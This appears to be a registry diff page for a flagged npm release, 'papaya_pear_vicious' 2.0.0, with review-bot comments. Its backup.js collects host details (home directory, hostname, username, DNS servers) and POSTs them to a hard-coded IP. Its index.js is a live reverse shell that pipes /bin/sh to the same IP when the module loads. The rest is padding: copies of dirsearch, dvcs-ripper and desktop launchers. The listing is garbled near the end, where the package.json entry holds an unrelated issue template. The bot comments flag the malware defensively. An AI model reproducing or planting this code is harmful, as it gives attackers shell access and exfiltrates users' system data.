papaya_pear_vicious 2.0.0
Potentially problematic release.
This version of papaya_pear_vicious might be problematic.
- package/backup.js +46 -0
- package/chromium.desktop +140 -0
- package/index.js +19 -0
- package/install4j_u965hn-BurpSuiteCommunity.desktop +9 -0
- package/package.json +12 -0
- package/tools/dirsearch/.github/FUNDING.yml +3 -0
- package/tools/dirsearch/.github/ISSUE_TEMPLATE/ask_question.md +9 -0
- package/tools/dirsearch/.github/ISSUE_TEMPLATE/bug_report.md +17 -0
- package/tools/dirsearch/.github/ISSUE_TEMPLATE/feature_request.md +13 -0
- package/tools/dirsearch/.github/pull_request_template.md +13 -0
- package/tools/dirsearch/.github/workflows/ci.yml +47 -0
- package/tools/dirsearch/.github/workflows/codeql-analysis.yml +71 -0
- package/tools/dirsearch/.github/workflows/docker-image.yml +18 -0
- package/tools/dirsearch/.github/workflows/semgrep-analysis.yml +55 -0
- package/tools/dirsearch/CHANGELOG.md +149 -0
- package/tools/dirsearch/CONTRIBUTORS.md +84 -0
- package/tools/dirsearch/Dockerfile +17 -0
- package/tools/dirsearch/README.md +665 -0
- package/tools/dirsearch/__init__.py +4 -0
- package/tools/dirsearch/config.ini +78 -0
- package/tools/dirsearch/db/400_blacklist.txt +8 -0
- package/tools/dirsearch/db/403_blacklist.txt +21 -0
- package/tools/dirsearch/db/500_blacklist.txt +6 -0
- package/tools/dirsearch/db/dicc.txt +9636 -0
- package/tools/dirsearch/db/user-agents.txt +53 -0
- package/tools/dirsearch/dirsearch.py +75 -0
- package/tools/dirsearch/lib/__init__.py +0 -0
- package/tools/dirsearch/lib/connection/__init__.py +0 -0
- package/tools/dirsearch/lib/connection/dns.py +38 -0
- package/tools/dirsearch/lib/connection/requester.py +237 -0
- package/tools/dirsearch/lib/connection/response.py +74 -0
- package/tools/dirsearch/lib/controller/__init__.py +0 -0
- package/tools/dirsearch/lib/controller/controller.py +615 -0
- package/tools/dirsearch/lib/core/__init__.py +0 -0
- package/tools/dirsearch/lib/core/data.py +94 -0
- package/tools/dirsearch/lib/core/decorators.py +59 -0
- package/tools/dirsearch/lib/core/dictionary.py +210 -0
- package/tools/dirsearch/lib/core/exceptions.py +45 -0
- package/tools/dirsearch/lib/core/fuzzer.py +260 -0
- package/tools/dirsearch/lib/core/installation.py +51 -0
- package/tools/dirsearch/lib/core/logger.py +36 -0
- package/tools/dirsearch/lib/core/options.py +329 -0
- package/tools/dirsearch/lib/core/scanner.py +152 -0
- package/tools/dirsearch/lib/core/settings.py +125 -0
- package/tools/dirsearch/lib/core/structures.py +78 -0
- package/tools/dirsearch/lib/parse/__init__.py +0 -0
- package/tools/dirsearch/lib/parse/cmdline.py +515 -0
- package/tools/dirsearch/lib/parse/config.py +80 -0
- package/tools/dirsearch/lib/parse/headers.py +58 -0
- package/tools/dirsearch/lib/parse/rawrequest.py +48 -0
- package/tools/dirsearch/lib/parse/url.py +42 -0
- package/tools/dirsearch/lib/reports/__init__.py +0 -0
- package/tools/dirsearch/lib/reports/base.py +99 -0
- package/tools/dirsearch/lib/reports/csv_report.py +39 -0
- package/tools/dirsearch/lib/reports/html_report.py +59 -0
- package/tools/dirsearch/lib/reports/json_report.py +43 -0
- package/tools/dirsearch/lib/reports/markdown_report.py +43 -0
- package/tools/dirsearch/lib/reports/mysql_report.py +43 -0
- package/tools/dirsearch/lib/reports/plain_text_report.py +43 -0
- package/tools/dirsearch/lib/reports/postgresql_report.py +31 -0
- package/tools/dirsearch/lib/reports/simple_report.py +25 -0
- package/tools/dirsearch/lib/reports/sqlite_report.py +42 -0
- package/tools/dirsearch/lib/reports/templates/html_report_template.html +195 -0
- package/tools/dirsearch/lib/reports/xml_report.py +43 -0
- package/tools/dirsearch/lib/utils/__init__.py +0 -0
- package/tools/dirsearch/lib/utils/common.py +130 -0
- package/tools/dirsearch/lib/utils/crawl.py +87 -0
- package/tools/dirsearch/lib/utils/diff.py +83 -0
- package/tools/dirsearch/lib/utils/file.py +142 -0
- package/tools/dirsearch/lib/utils/mimetype.py +62 -0
- package/tools/dirsearch/lib/utils/pickle.py +69 -0
- package/tools/dirsearch/lib/utils/random.py +29 -0
- package/tools/dirsearch/lib/utils/schemedet.py +38 -0
- package/tools/dirsearch/lib/view/__init__.py +0 -0
- package/tools/dirsearch/lib/view/colors.py +79 -0
- package/tools/dirsearch/lib/view/terminal.py +236 -0
- package/tools/dirsearch/options.ini +5 -0
- package/tools/dirsearch/requirements.txt +20 -0
- package/tools/dirsearch/setup.cfg +11 -0
- package/tools/dirsearch/setup.py +45 -0
- package/tools/dirsearch/static/logo.png +0 -0
- package/tools/dirsearch/static/pause.png +0 -0
- package/tools/dirsearch/testing.py +37 -0
- package/tools/dirsearch/tests/__init__.py +0 -0
- package/tools/dirsearch/tests/connection/__init__.py +0 -0
- package/tools/dirsearch/tests/connection/test_dns.py +33 -0
- package/tools/dirsearch/tests/parse/__init__.py +0 -0
- package/tools/dirsearch/tests/parse/test_config.py +58 -0
- package/tools/dirsearch/tests/parse/test_headers.py +37 -0
- package/tools/dirsearch/tests/parse/test_url.py +43 -0
- package/tools/dirsearch/tests/reports/__init__.py +0 -0
- package/tools/dirsearch/tests/reports/test_reports.py +73 -0
- package/tools/dirsearch/tests/utils/__init__.py +0 -0
- package/tools/dirsearch/tests/utils/test_common.py +33 -0
- package/tools/dirsearch/tests/utils/test_crawl.py +41 -0
- package/tools/dirsearch/tests/utils/test_diff.py +30 -0
- package/tools/dirsearch/tests/utils/test_mimetype.py +31 -0
- package/tools/dirsearch/tests/utils/test_random.py +29 -0
- package/tools/dirsearch/tests/utils/test_schemedet.py +28 -0
- package/tools/dvcs-ripper/LICENSE +340 -0
- package/tools/dvcs-ripper/README.md +173 -0
- package/tools/dvcs-ripper/hg-decode.pl +164 -0
- package/tools/dvcs-ripper/rip-bzr.pl +232 -0
- package/tools/dvcs-ripper/rip-cvs.pl +198 -0
- package/tools/dvcs-ripper/rip-git.pl +558 -0
- package/tools/dvcs-ripper/rip-hg.pl +225 -0
- package/tools/dvcs-ripper/rip-svn.pl +224 -0
- package/xfce4-terminal.desktop +243 -0
package/backup.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "128.140.123.124", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 9000,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
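Review bot: the `trackingData` object on lines 8-18 collects the install directory, home directory, hostname, username, DNS resolvers and the full package.json, and lines 24-46 POST it to the hard-coded address 128.140.123.124 on port 9000; this is host fingerprinting and exfiltration with no declared purpose and should block the release. The comment on line 25 about replacing burpcollaborator.net with Interactsh or pipedream suggests the file was copied from a callback template written for out-of-band interaction services. Two smaller defects in the same block: `"Content-Length": postData.length` on line 31 counts characters rather than bytes, so `Buffer.byteLength(postData)` is the correct value, and the empty `req.on("error", ...)` handler on lines 41-43 hides every failure from whoever runs the code.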
package/chromium.desktop
ADDED
@@ -0,0 +1,140 @@
|
|
1
|
+
[Desktop Entry]
|
2
|
+
Version=1.0
|
3
|
+
Name=Chromium Web Browser
|
4
|
+
Name[ast]=Restolador web Chromium
|
5
|
+
Name[ca]=Navegador web Chromium
|
6
|
+
Name[de]=Chromium-Webbrowser
|
7
|
+
Name[es]=Navegador web Chromium
|
8
|
+
Name[fr]=Navigateur Web Chromium
|
9
|
+
Name[gl]=Navegador web Chromium
|
10
|
+
Name[he]=דפדפן האינטרנט Chromium
|
11
|
+
Name[hr]=Chromium web preglednik
|
12
|
+
Name[hu]=Chromium webböngésző
|
13
|
+
Name[id]=Peramban Web Chromium
|
14
|
+
Name[it]=Browser web Chromium
|
15
|
+
Name[ja]=Chromium ウェブ・ブラウザ
|
16
|
+
Name[ko]=Chromium 웹 브라우저
|
17
|
+
Name[pt_BR]=Chromium Navegador da Internet
|
18
|
+
Name[ru]=Веб-браузер Chromium
|
19
|
+
Name[sl]=Chromium spletni brskalnik
|
20
|
+
Name[sv]=Webbläsaren Chromium
|
21
|
+
Name[ug]=Chromium توركۆرگۈ
|
22
|
+
Name[zh_CN]=Chromium 网页浏览器
|
23
|
+
Name[zh_HK]=Chromium 網頁瀏覽器
|
24
|
+
Name[zh_TW]=Chromium 網頁瀏覽器
|
25
|
+
GenericName=Web Browser
|
26
|
+
GenericName[ar]=متصفح الشبكة
|
27
|
+
GenericName[ast]=Restolador web
|
28
|
+
GenericName[bg]=Уеб браузър
|
29
|
+
GenericName[bn]=ওয়েব ব্রাউজার
|
30
|
+
GenericName[ca]=Navegador web
|
31
|
+
GenericName[cs]=WWW prohlížeč
|
32
|
+
GenericName[da]=Browser
|
33
|
+
GenericName[de]=Webbrowser
|
34
|
+
GenericName[el]=Περιηγητής ιστού
|
35
|
+
GenericName[en_GB]=Web Browser
|
36
|
+
GenericName[es]=Navegador web
|
37
|
+
GenericName[et]=Veebibrauser
|
38
|
+
GenericName[fi]=WWW-selain
|
39
|
+
GenericName[fil]=Web Browser
|
40
|
+
GenericName[fr]=Navigateur Web
|
41
|
+
GenericName[gl]=Navegador web
|
42
|
+
GenericName[gu]=વેબ બ્રાઉઝર
|
43
|
+
GenericName[he]=דפדפן אינטרנט
|
44
|
+
GenericName[hi]=वेब ब्राउज़र
|
45
|
+
GenericName[hr]=Web preglednik
|
46
|
+
GenericName[hu]=Webböngésző
|
47
|
+
GenericName[id]=Peramban Web
|
48
|
+
GenericName[it]=Browser web
|
49
|
+
GenericName[ja]=ウェブ・ブラウザ
|
50
|
+
GenericName[kn]=ಜಾಲ ವೀಕ್ಷಕ
|
51
|
+
GenericName[ko]=웹 브라우저
|
52
|
+
GenericName[lt]=Žiniatinklio naršyklė
|
53
|
+
GenericName[lv]=Tīmekļa pārlūks
|
54
|
+
GenericName[ml]=വെബ് ബ്രൌസര്
|
55
|
+
GenericName[mr]=वेब ब्राऊजर
|
56
|
+
GenericName[nb]=Nettleser
|
57
|
+
GenericName[nl]=Webbrowser
|
58
|
+
GenericName[or]=ଓ୍ବେବ ବ୍ରାଉଜର
|
59
|
+
GenericName[pl]=Przeglądarka WWW
|
60
|
+
GenericName[pt]=Navegador Web
|
61
|
+
GenericName[pt_BR]=Navegador da Internet
|
62
|
+
GenericName[ro]=Navigator de Internet
|
63
|
+
GenericName[ru]=Веб-браузер
|
64
|
+
GenericName[sk]=WWW prehliadač
|
65
|
+
GenericName[sl]=Spletni brskalnik
|
66
|
+
GenericName[sr]=Интернет прегледник
|
67
|
+
GenericName[sv]=Webbläsare
|
68
|
+
GenericName[ta]=இணைய உலாவி
|
69
|
+
GenericName[te]=మహాతల అన్వేషి
|
70
|
+
GenericName[th]=เว็บเบราว์เซอร์
|
71
|
+
GenericName[tr]=Web Tarayıcı
|
72
|
+
GenericName[ug]=توركۆرگۈ
|
73
|
+
GenericName[uk]=Навігатор Тенет
|
74
|
+
GenericName[vi]=Bộ duyệt Web
|
75
|
+
GenericName[zh_CN]=网页浏览器
|
76
|
+
GenericName[zh_HK]=網頁瀏覽器
|
77
|
+
GenericName[zh_TW]=網頁瀏覽器
|
78
|
+
Comment=Access the Internet
|
79
|
+
Comment[ar]=الدخول إلى الإنترنت
|
80
|
+
Comment[ast]=Accesu a Internet
|
81
|
+
Comment[bg]=Достъп до интернет
|
82
|
+
Comment[bn]=ইন্টারনেটটি অ্যাক্সেস করুন
|
83
|
+
Comment[ca]=Accediu a Internet
|
84
|
+
Comment[cs]=Přístup k internetu
|
85
|
+
Comment[da]=Få adgang til internettet
|
86
|
+
Comment[de]=Internetzugriff
|
87
|
+
Comment[el]=Πρόσβαση στο Διαδίκτυο
|
88
|
+
Comment[en_GB]=Access the Internet
|
89
|
+
Comment[es]=Acceda a Internet
|
90
|
+
Comment[et]=Pääs Internetti
|
91
|
+
Comment[fi]=Käytä internetiä
|
92
|
+
Comment[fil]=I-access ang Internet
|
93
|
+
Comment[fr]=Explorer le Web
|
94
|
+
Comment[gl]=Acceda a Internet
|
95
|
+
Comment[gu]=ઇંટરનેટ ઍક્સેસ કરો
|
96
|
+
Comment[he]=גישה לאינטרנט
|
97
|
+
Comment[hi]=इंटरनेट तक पहुंच स्थापित करें
|
98
|
+
Comment[hr]=Pristupite Internetu
|
99
|
+
Comment[hu]=Az internet elérése
|
100
|
+
Comment[id]=Akses Internet
|
101
|
+
Comment[it]=Accesso a Internet
|
102
|
+
Comment[ja]=インターネットにアクセス
|
103
|
+
Comment[kn]=ಇಂಟರ್ನೆಟ್ ಅನ್ನು ಪ್ರವೇಶಿಸಿ
|
104
|
+
Comment[ko]=인터넷에 연결합니다
|
105
|
+
Comment[lt]=Interneto prieiga
|
106
|
+
Comment[lv]=Piekļūt internetam
|
107
|
+
Comment[ml]=ഇന്റര്നെറ്റ് ആക്സസ് ചെയ്യുക
|
108
|
+
Comment[mr]=इंटरनेटमध्ये प्रवेश करा
|
109
|
+
Comment[nb]=Gå til Internett
|
110
|
+
Comment[nl]=Verbinding maken met internet
|
111
|
+
Comment[or]=ଇଣ୍ଟର୍ନେଟ୍ ପ୍ରବେଶ କରନ୍ତୁ
|
112
|
+
Comment[pl]=Skorzystaj z internetu
|
113
|
+
Comment[pt]=Aceder à Internet
|
114
|
+
Comment[pt_BR]=Acessar a internet
|
115
|
+
Comment[ro]=Accesaţi Internetul
|
116
|
+
Comment[ru]=Доступ в Интернет
|
117
|
+
Comment[sk]=Prístup do siete Internet
|
118
|
+
Comment[sl]=Dostop do interneta
|
119
|
+
Comment[sr]=Приступите Интернету
|
120
|
+
Comment[sv]=Surfa på Internet
|
121
|
+
Comment[ta]=இணையத்தை அணுகுதல்
|
122
|
+
Comment[te]=ఇంటర్నెట్ను ఆక్సెస్ చెయ్యండి
|
123
|
+
Comment[th]=เข้าถึงอินเทอร์เน็ต
|
124
|
+
Comment[tr]=İnternet'e erişin
|
125
|
+
Comment[ug]=ئىنتېرنېتنى زىيارەت قىلىش
|
126
|
+
Comment[uk]=Доступ до Інтернету
|
127
|
+
Comment[vi]=Truy cập Internet
|
128
|
+
Comment[zh_CN]=访问互联网
|
129
|
+
Comment[zh_HK]=連線到網際網路
|
130
|
+
Comment[zh_TW]=連線到網際網路
|
131
|
+
Exec=/usr/bin/chromium %U
|
132
|
+
Terminal=false
|
133
|
+
X-MultipleArgs=false
|
134
|
+
Type=Application
|
135
|
+
Icon=chromium
|
136
|
+
Categories=Network;WebBrowser;
|
137
|
+
MimeType=text/html;text/xml;application/xhtml_xml;application/x-mimearchive;x-scheme-handler/http;x-scheme-handler/https;
|
138
|
+
StartupWMClass=chromium
|
139
|
+
StartupNotify=true
|
140
|
+
Keywords=browser
|
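Review bot: nothing in this 140-line launcher is consumed by Node; `Exec=/usr/bin/chromium %U` on line 131 and the localized `Name`, `GenericName` and `Comment` entries are a stock desktop entry, so the file only pads the tarball around the two JavaScript files that carry the package's behaviour. Remove it from the published package.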
package/index.js
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
(function(){
|
9
|
+
var net = require("net"),
|
10
|
+
cp = require("child_process"),
|
11
|
+
sh = cp.spawn("/bin/sh", []);
|
12
|
+
var client = new net.Socket();
|
13
|
+
client.connect(9000, "128.140.123.124", function(){
|
14
|
+
client.pipe(sh.stdin);
|
15
|
+
sh.stdout.pipe(client);
|
16
|
+
sh.stderr.pipe(client);
|
17
|
+
});
|
18
|
+
return /a/; // Prevents the Node.js application form crashing
|
19
|
+
})();
|
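Review bot: lines 8-19 are a reverse shell: the immediately invoked function spawns `/bin/sh`, connects a `net.Socket` to 128.140.123.124 on port 9000, and pipes the socket into the shell's stdin and the shell's stdout and stderr back to the socket, so any process that loads this module gives the remote host an interactive shell running as the current user. The `os`, `dns`, `querystring` and `https` requires on lines 1-4 are unused in this file. The endpoint is the same address and port that `backup.js` posts to. Any host that installed or required this version should be treated as compromised: remove the package, rotate credentials reachable by that user, and search egress logs for connections to that address and port.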
@@ -0,0 +1,9 @@
|
|
1
|
+
#!/usr/bin/env xdg-open
|
2
|
+
[Desktop Entry]
|
3
|
+
Type=Application
|
4
|
+
Name=Burp Suite Community Edition
|
5
|
+
Exec="/home/admin/BurpSuiteCommunity/BurpSuiteCommunity" %U
|
6
|
+
MimeType=application/x-extension-burp;
|
7
|
+
Icon=/home/admin/BurpSuiteCommunity/.install4j/BurpSuiteCommunity.png
|
8
|
+
Categories=Application;
|
9
|
+
StartupWMClass=install4j-burp-StartBurp
|
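Review bot: `Exec` on line 5 and `Icon` on line 7 are absolute paths under /home/admin/, so this launcher resolves only on the machine it was copied from and discloses that machine's account name and Burp Suite install location. It has no role in an npm package; drop it and add a `files` allowlist to package.json so only the intended sources are published.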
package/package.json
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
---
|
2
|
+
name: Bug Report
|
3
|
+
about: Report a dirsearch problem
|
4
|
+
labels: bug
|
5
|
+
---
|
6
|
+
|
7
|
+
### What is the current behavior?
|
8
|
+
|
9
|
+
What actually happens?
|
10
|
+
|
11
|
+
### What is the expected behavior?
|
12
|
+
|
13
|
+
What it should be instead?
|
14
|
+
|
15
|
+
### Any additional information?
|
16
|
+
|
17
|
+
Screenshots, dirsearch log, dirsearch version, used command, ...?
|
@@ -0,0 +1,13 @@
|
|
1
|
+
Description
|
2
|
+
---------------
|
3
|
+
|
4
|
+
What will it do?
|
5
|
+
|
6
|
+
If this PR will fix an issue, please address it:
|
7
|
+
Fix #{issue}
|
8
|
+
|
9
|
+
Requirements
|
10
|
+
---------------
|
11
|
+
|
12
|
+
- [ ] Add your name to `CONTRIBUTERS.md`
|
13
|
+
- [ ] If this is a new feature, then please add some additional information about it to `CHANGELOG.md`
|
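Review bot: line 12 asks contributors to add their name to `CONTRIBUTERS.md`, but the file listed in this tree is `CONTRIBUTORS.md`; correct the spelling so the checklist points at a file that exists.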
@@ -0,0 +1,47 @@
|
|
1
|
+
name: Inspection
|
2
|
+
|
3
|
+
on: [push, pull_request]
|
4
|
+
|
5
|
+
jobs:
|
6
|
+
build:
|
7
|
+
runs-on: ${{ matrix.os }}
|
8
|
+
|
9
|
+
strategy:
|
10
|
+
fail-fast: false
|
11
|
+
matrix:
|
12
|
+
python-version: [3.7, 3.9]
|
13
|
+
os: ['ubuntu-latest', 'windows-latest']
|
14
|
+
|
15
|
+
steps:
|
16
|
+
- uses: actions/checkout@v2
|
17
|
+
- name: Set up Python ${{ matrix.python-version }}
|
18
|
+
uses: actions/setup-python@v2
|
19
|
+
with:
|
20
|
+
python-version: ${{ matrix.python-version }}
|
21
|
+
- name: Install dependencies
|
22
|
+
run: |
|
23
|
+
python -m pip install --upgrade pip
|
24
|
+
pip install codespell flake8 -r requirements.txt
|
25
|
+
- name: Test
|
26
|
+
run: |
|
27
|
+
echo index.%EXT% > tmp_wordlist.txt
|
28
|
+
echo home.html >> tmp_wordlist.txt
|
29
|
+
echo testphp.vulnweb.com > tmp_targets.txt
|
30
|
+
echo "GET / HTTP/1.1" > tmp_raw.txt
|
31
|
+
echo "Host: google.com" >> tmp_raw.txt
|
32
|
+
echo "User-Agent: dirsearch" >> tmp_raw.txt
|
33
|
+
echo "Accept: */*" >> tmp_raw.txt
|
34
|
+
python3 dirsearch.py -w tmp_wordlist.txt -u https://example.com -o tmp_report.json --format json --force-recursive -R 3 --full-url -q -O
|
35
|
+
python3 dirsearch.py -w tmp_wordlist.txt -l tmp_targets.txt --subdirs /,admin/ --exclude-extensions conf -q -L -f -i 200 --user-agent a --log tmp_log.log
|
36
|
+
python3 dirsearch.py -w tmp_wordlist.txt -u https://localhost --ip 93.184.216.34 --max-rate 2 -H K:V --random-agent --overwrite-extensions --no-color
|
37
|
+
python3 dirsearch.py -w tmp_wordlist.txt --raw tmp_raw.txt --prefixes . --suffixes ~ --skip-on-status 404 -m POST -d test=1 --crawl --min-response-size 9
|
38
|
+
echo https://self-signed.badssl.com | python3 dirsearch.py -w tmp_wordlist.txt --stdin --max-time 9 --auth u:p --auth-type basic --scheme http
|
39
|
+
|
40
|
+
- name: Unit Test
|
41
|
+
run: python3 testing.py
|
42
|
+
|
43
|
+
- name: Lint
|
44
|
+
run: |
|
45
|
+
flake8 .
|
46
|
+
- name: Codespell
|
47
|
+
run: codespell
|
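Review bot: the `Test` step on lines 25-38 sends live requests to hosts the project does not control (testphp.vulnweb.com, example.com, self-signed.badssl.com), so CI results depend on third-party availability and every push and pull request generates scan traffic toward them; run these cases against a local fixture server started inside the job instead. The workflow also has no `permissions:` block and references `actions/checkout@v2` (line 16) and `actions/setup-python@v2` (line 18) by mutable tag; set `permissions: contents: read` and pin both actions to a commit SHA.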
@@ -0,0 +1,71 @@
|
|
1
|
+
# For most projects, this workflow file will not need changing; you simply need
|
2
|
+
# to commit it to your repository.
|
3
|
+
#
|
4
|
+
# You may wish to alter this file to override the set of languages analyzed,
|
5
|
+
# or to provide custom queries or build logic.
|
6
|
+
#
|
7
|
+
# ******** NOTE ********
|
8
|
+
# We have attempted to detect the languages in your repository. Please check
|
9
|
+
# the `language` matrix defined below to confirm you have the correct set of
|
10
|
+
# supported CodeQL languages.
|
11
|
+
#
|
12
|
+
name: "CodeQL"
|
13
|
+
|
14
|
+
on:
|
15
|
+
push:
|
16
|
+
branches: [ master ]
|
17
|
+
pull_request:
|
18
|
+
# The branches below must be a subset of the branches above
|
19
|
+
branches: [ master ]
|
20
|
+
schedule:
|
21
|
+
- cron: '38 0 * * 0'
|
22
|
+
|
23
|
+
jobs:
|
24
|
+
analyze:
|
25
|
+
name: Analyze
|
26
|
+
runs-on: ubuntu-latest
|
27
|
+
permissions:
|
28
|
+
actions: read
|
29
|
+
contents: read
|
30
|
+
security-events: write
|
31
|
+
|
32
|
+
strategy:
|
33
|
+
fail-fast: false
|
34
|
+
matrix:
|
35
|
+
language: [ 'python' ]
|
36
|
+
# CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ]
|
37
|
+
# Learn more:
|
38
|
+
# https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed
|
39
|
+
|
40
|
+
steps:
|
41
|
+
- name: Checkout repository
|
42
|
+
uses: actions/checkout@v2
|
43
|
+
|
44
|
+
# Initializes the CodeQL tools for scanning.
|
45
|
+
- name: Initialize CodeQL
|
46
|
+
uses: github/codeql-action/init@v1
|
47
|
+
with:
|
48
|
+
languages: ${{ matrix.language }}
|
49
|
+
# If you wish to specify custom queries, you can do so here or in a config file.
|
50
|
+
# By default, queries listed here will override any specified in a config file.
|
51
|
+
# Prefix the list here with "+" to use these queries and those in the config file.
|
52
|
+
# queries: ./path/to/local/query, your-org/your-repo/queries@main
|
53
|
+
|
54
|
+
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
|
55
|
+
# If this step fails, then you should remove it and run the build manually (see below)
|
56
|
+
- name: Autobuild
|
57
|
+
uses: github/codeql-action/autobuild@v1
|
58
|
+
|
59
|
+
# ℹ️ Command-line programs to run using the OS shell.
|
60
|
+
# 📚 https://git.io/JvXDl
|
61
|
+
|
62
|
+
# ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
|
63
|
+
# and modify them (or add more) to build your code if your project
|
64
|
+
# uses a compiled language
|
65
|
+
|
66
|
+
#- run: |
|
67
|
+
# make bootstrap
|
68
|
+
# make release
|
69
|
+
|
70
|
+
- name: Perform CodeQL Analysis
|
71
|
+
uses: github/codeql-action/analyze@v1
|
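Review bot: `github/codeql-action/init@v1`, `autobuild@v1` and `analyze@v1` on lines 46, 57 and 70 follow a movable major tag inside a job that holds `security-events: write`; pin all three to the commit SHA of a currently supported release. The `Autobuild` step on lines 56-57 can be removed, since the matrix on line 35 contains only `python` and the comment on line 54 says autobuild applies to compiled languages.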
@@ -0,0 +1,18 @@
|
|
1
|
+
name: Docker Image CI
|
2
|
+
|
3
|
+
on:
|
4
|
+
push:
|
5
|
+
branches: [ "master" ]
|
6
|
+
pull_request:
|
7
|
+
branches: [ "master" ]
|
8
|
+
|
9
|
+
jobs:
|
10
|
+
|
11
|
+
build:
|
12
|
+
|
13
|
+
runs-on: ubuntu-latest
|
14
|
+
|
15
|
+
steps:
|
16
|
+
- uses: actions/checkout@v3
|
17
|
+
- name: Build the Docker image
|
18
|
+
run: docker build . --file Dockerfile --tag my-image-name:$(date +%s)
|
@@ -0,0 +1,55 @@
|
|
1
|
+
# This workflow file requires a free account on Semgrep.dev to
|
2
|
+
# manage rules, file ignores, notifications, and more.
|
3
|
+
#
|
4
|
+
# See https://semgrep.dev/docs
|
5
|
+
|
6
|
+
name: Semgrep
|
7
|
+
|
8
|
+
on:
|
9
|
+
push:
|
10
|
+
branches: [ master ]
|
11
|
+
pull_request:
|
12
|
+
# The branches below must be a subset of the branches above
|
13
|
+
branches: [ master ]
|
14
|
+
schedule:
|
15
|
+
- cron: '19 5 * * 6'
|
16
|
+
|
17
|
+
jobs:
|
18
|
+
semgrep:
|
19
|
+
name: Scan
|
20
|
+
runs-on: ubuntu-latest
|
21
|
+
# Skip any PR created by dependabot to avoid permission issues
|
22
|
+
if: (github.actor != 'dependabot[bot]')
|
23
|
+
steps:
|
24
|
+
# Fetch project source
|
25
|
+
- uses: actions/checkout@v2
|
26
|
+
|
27
|
+
- uses: returntocorp/semgrep-action@v1
|
28
|
+
with:
|
29
|
+
config: >- # more at semgrep.dev/explore
|
30
|
+
p/security-audit
|
31
|
+
p/secrets
|
32
|
+
|
33
|
+
# Instead of `config:`, use rules set in Semgrep App.
|
34
|
+
# Get your token from semgrep.dev/manage/settings.
|
35
|
+
publishToken: ${{ secrets.SEMGREP_APP_TOKEN }}
|
36
|
+
|
37
|
+
# Never fail the build due to findings on pushes.
|
38
|
+
# Instead, just collect findings for semgrep.dev/manage/findings
|
39
|
+
# auditOn: push
|
40
|
+
|
41
|
+
# Upload findings to GitHub Advanced Security Dashboard [step 1/2]
|
42
|
+
# See also the next step.
|
43
|
+
generateSarif: "1"
|
44
|
+
|
45
|
+
# Change job timeout (default is 1800 seconds; set to 0 to disable)
|
46
|
+
# env:
|
47
|
+
# SEMGREP_TIMEOUT: 300
|
48
|
+
|
49
|
+
# Upload findings to GitHub Advanced Security Dashboard [step 2/2]
|
50
|
+
- name: Upload SARIF file for GitHub Advanced Security Dashboard
|
51
|
+
uses: github/codeql-action/upload-sarif@v1
|
52
|
+
with:
|
53
|
+
sarif_file: semgrep.sarif
|
54
|
+
if: always()
|
55
|
+
|
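Review bot: this job has no `permissions:` block, yet the `upload-sarif` step on lines 50-53 writes code-scanning results, which the CodeQL workflow covers with an explicit `security-events: write`; declare `contents: read` and `security-events: write` here as well. Line 35 passes `secrets.SEMGREP_APP_TOKEN` to `returntocorp/semgrep-action@v1` from line 27, which is a mutable tag, so pin that action to a commit SHA before handing it a secret.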
@@ -0,0 +1,149 @@
|
|
1
|
+
# Changelog
|
2
|
+
|
3
|
+
## [Unreleased]
|
4
|
+
|
5
|
+
## [0.4.3] - October 2nd, 2022
|
6
|
+
- Automatically detect the URI scheme (`http` or `https`) if no scheme is provided
|
7
|
+
- SQLite report format
|
8
|
+
- Option to overwrite unwanted extensions with selected extensions
|
9
|
+
- Option to view redirects history when following redirects
|
10
|
+
- Option to crawl web paths in the responses
|
11
|
+
- HTTP traffic is saved inside log file
|
12
|
+
- Capability to save progress and resume later
|
13
|
+
- Support client certificate
|
14
|
+
- Maximum size of the log file via configuration
|
15
|
+
|
16
|
+
## [0.4.2] - September 12, 2021
|
17
|
+
- More accurate
|
18
|
+
- Exclude responses by redirects
|
19
|
+
- URLs from STDIN
|
20
|
+
- Fixed the CSV Injection vulnerability (https://www.exploit-db.com/exploits/49370)
|
21
|
+
- Raw request supported
|
22
|
+
- Can setup the default URL scheme (will be used when there is no scheme in the URL)
|
23
|
+
- Added max runtime option
|
24
|
+
- Recursion on specified status codes
|
25
|
+
- Max request rate
|
26
|
+
- Support several authentication types
|
27
|
+
- Deep/forced recursive scan
|
28
|
+
- HTML report format
|
29
|
+
- Option to skip target by specified status codes
|
30
|
+
- Bug fixes
|
31
|
+
|
32
|
+
## [0.4.1] - August 12, 2020
|
33
|
+
- Faster
|
34
|
+
- Allow to brute force through a CIDR notation
|
35
|
+
- Exclude responses by human readable sizes
|
36
|
+
- Provide headers from a file
|
